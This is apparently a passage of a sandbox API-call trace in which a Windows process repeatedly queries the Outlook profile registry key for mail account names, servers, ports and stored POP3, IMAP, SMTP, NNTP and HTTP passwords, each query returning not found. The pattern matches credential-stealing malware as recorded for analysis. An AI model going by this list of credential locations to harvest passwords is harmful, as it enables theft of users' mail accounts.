[0249.216] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.216] RegCloseKey (hKey=0x95c) returned 0x0 [0249.216] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.216] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.216] RegCloseKey (hKey=0x95c) returned 0x0 [0249.216] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.216] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.216] RegCloseKey (hKey=0x95c) returned 0x0 [0249.216] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.216] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.216] RegCloseKey (hKey=0x95c) returned 0x0 [0249.216] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.217] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.217] RegCloseKey (hKey=0x95c) returned 0x0 [0249.217] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.217] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.217] RegCloseKey (hKey=0x95c) returned 0x0 [0249.217] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.217] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.217] RegCloseKey (hKey=0x95c) returned 0x0 [0249.217] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.217] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.217] RegCloseKey (hKey=0x95c) returned 0x0 [0249.217] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.217] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.217] RegCloseKey (hKey=0x95c) returned 0x0 [0249.217] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.217] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.217] RegCloseKey (hKey=0x95c) returned 0x0 [0249.217] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.217] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.217] RegCloseKey (hKey=0x95c) returned 0x0 [0249.218] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.218] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.218] RegCloseKey (hKey=0x95c) returned 0x0 [0249.218] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.218] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.218] RegCloseKey (hKey=0x95c) returned 0x0 [0249.218] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.218] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.218] RegCloseKey (hKey=0x95c) returned 0x0 [0249.218] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.218] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.218] RegCloseKey (hKey=0x95c) returned 0x0 [0249.218] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.218] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.218] RegCloseKey (hKey=0x95c) returned 0x0 [0249.218] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.218] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.218] RegCloseKey (hKey=0x95c) returned 0x0 [0249.218] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.218] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.219] RegCloseKey (hKey=0x95c) returned 0x0 [0249.219] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.219] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.219] RegCloseKey (hKey=0x95c) returned 0x0 [0249.219] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.219] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.219] RegCloseKey (hKey=0x95c) returned 0x0 [0249.219] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.219] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.219] RegCloseKey (hKey=0x95c) returned 0x0 [0249.219] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.219] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.219] RegCloseKey (hKey=0x95c) returned 0x0 [0249.219] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.219] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.219] RegCloseKey (hKey=0x95c) returned 0x0 [0249.219] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.219] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.219] RegCloseKey (hKey=0x95c) returned 0x0 [0249.219] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.220] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.220] RegCloseKey (hKey=0x95c) returned 0x0 [0249.220] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.220] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.220] RegCloseKey (hKey=0x95c) returned 0x0 [0249.220] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.220] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.220] RegCloseKey (hKey=0x95c) returned 0x0 [0249.220] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.220] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.220] RegCloseKey (hKey=0x95c) returned 0x0 [0249.220] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.220] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.220] RegCloseKey (hKey=0x95c) returned 0x0 [0249.220] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.220] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.220] RegCloseKey (hKey=0x95c) returned 0x0 [0249.220] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.220] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.221] RegCloseKey (hKey=0x95c) returned 0x0 [0249.221] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.221] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.221] RegCloseKey (hKey=0x95c) returned 0x0 [0249.221] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.221] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.221] RegCloseKey (hKey=0x95c) returned 0x0 [0249.221] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.221] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.221] RegCloseKey (hKey=0x95c) returned 0x0 [0249.221] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.221] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.221] RegCloseKey (hKey=0x95c) returned 0x0 [0249.221] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.221] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.221] RegCloseKey (hKey=0x95c) returned 0x0 [0249.221] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.222] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.222] RegCloseKey (hKey=0x95c) returned 0x0 [0249.222] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.222] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.222] RegCloseKey (hKey=0x95c) returned 0x0 [0249.222] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.222] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.222] RegCloseKey (hKey=0x95c) returned 0x0 [0249.222] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.222] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.222] RegCloseKey (hKey=0x95c) returned 0x0 [0249.222] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.222] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.222] RegCloseKey (hKey=0x95c) returned 0x0 [0249.222] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.222] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.222] RegCloseKey (hKey=0x95c) returned 0x0 [0249.222] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.222] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.222] RegCloseKey (hKey=0x95c) returned 0x0 [0249.222] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.223] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.223] RegCloseKey (hKey=0x95c) returned 0x0 [0249.223] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.223] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.223] RegCloseKey (hKey=0x95c) returned 0x0 [0249.223] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.223] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.223] RegCloseKey (hKey=0x95c) returned 0x0 [0249.223] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", ulOptions=0x0, samDesired=0x101, 